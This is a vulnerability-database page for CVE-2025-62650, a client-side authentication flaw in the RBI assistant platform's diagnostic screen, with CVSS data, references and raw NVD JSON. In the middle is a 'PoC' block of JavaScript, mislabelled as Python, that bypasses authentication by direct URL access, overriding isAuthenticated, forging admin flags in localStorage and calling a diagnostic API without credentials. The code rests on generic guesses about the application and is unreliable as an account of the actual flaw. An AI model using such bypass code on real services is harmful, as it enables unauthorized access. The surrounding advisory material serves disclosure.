CVE-2025-62650

Description

The Restaurant Brands International (RBI) assistant platform through 2025-09-06 relies on client-side authentication for use of the diagnostic screen.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:* - VULNERABLE

RBI Assistant Platform <= 2025-09-06

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-62650 - RBI Assistant Platform Diagnostic Screen Client-Side Auth Bypass PoC
// Vulnerability: Client-side only authentication for diagnostic screen access
// Affected: RBI Assistant Platform through 2025-09-06

// Method 1: Direct URL Access
// Simply navigate to the diagnostic screen URL without authentication
// The server does not enforce authentication checks
const diagnosticUrl = 'https://rbi-assistant.example.com/diagnostic';
window.location.href = diagnosticUrl;

// Method 2: Bypass Client-Side JavaScript Authentication Check
// Override client-side auth validation functions
function bypassClientSideAuth() {
    // Override common client-side auth check functions
    Object.defineProperty(window, 'isAuthenticated', {
        get: function() { return true; },
        configurable: false
    });
    
    // Override localStorage/sessionStorage auth flags
    localStorage.setItem('auth_token', 'bypass_token');
    localStorage.setItem('user_role', 'admin');
    localStorage.setItem('diagnostic_access', 'granted');
    
    // Trigger any post-authentication initialization
    if (typeof onAuthSuccess === 'function') {
        onAuthSuccess();
    }
    
    console.log('Client-side authentication bypassed successfully');
}

// Method 3: Direct API Access via Fetch
// Access diagnostic endpoints directly without authentication headers
async function accessDiagnosticAPI() {
    try {
        const response = await fetch('https://rbi-assistant.example.com/api/diagnostic/status', {
            method: 'GET',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
                // No Authorization header needed - server doesn't validate
            }
        });
        
        const data = await response.json();
        console.log('Diagnostic data accessed:', data);
        return data;
    } catch (error) {
        console.error('Error accessing diagnostic API:', error);
    }
}

// Execute the bypass
bypassClientSideAuth();
// accessDiagnosticAPI();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62650
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62650
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62650/
[4] VulDB https://vuldb.com/cve/CVE-2025-62650
[5] https://archive.today/fMYQp
[6] https://bobdahacker.com/blog/rbi-hacked-drive-thrus/
[7] https://web.archive.org/web/20250906134240/https:/bobdahacker.com/blog/rbi-hacked-drive-thrus
[8] https://www.malwarebytes.com/blog/news/2025/09/popeyes-tim-hortons-burger-king-platforms-have-catastrophic-vulnerabilities-say-hackers
[9] https://www.yahoo.com/news/articles/burger-king-hacked-attackers-impressed-124154038.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62650", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:38.337", "lastModified": "2025-10-31T18:39:28.907", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Restaurant Brands International (RBI) assistant platform through 2025-09-06 relies on client-side authentication for use of the diagnostic screen."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-603"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-09-06", "matchCriteriaId": "706D04A1-2EDB-4713-BA47-EFDC8A86FBA3"}]}]}], "references": [{"url": "https://archive.today/fMYQp", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bobdahacker.com/blog/rbi-hacked-drive-thrus/", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://web.archive.org/web/20250906134240/https:/bobdahacker.com/blog/rbi-hacked-drive-thrus", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.malwarebytes.com/blog/news/2025/09/popeyes-tim-hortons-burger-king-platforms-have-catastrophic-vulnerabilities-say-hackers", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.yahoo.com/news/articles/burger-king-hacked-attackers-impressed-124154038.html", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}]}}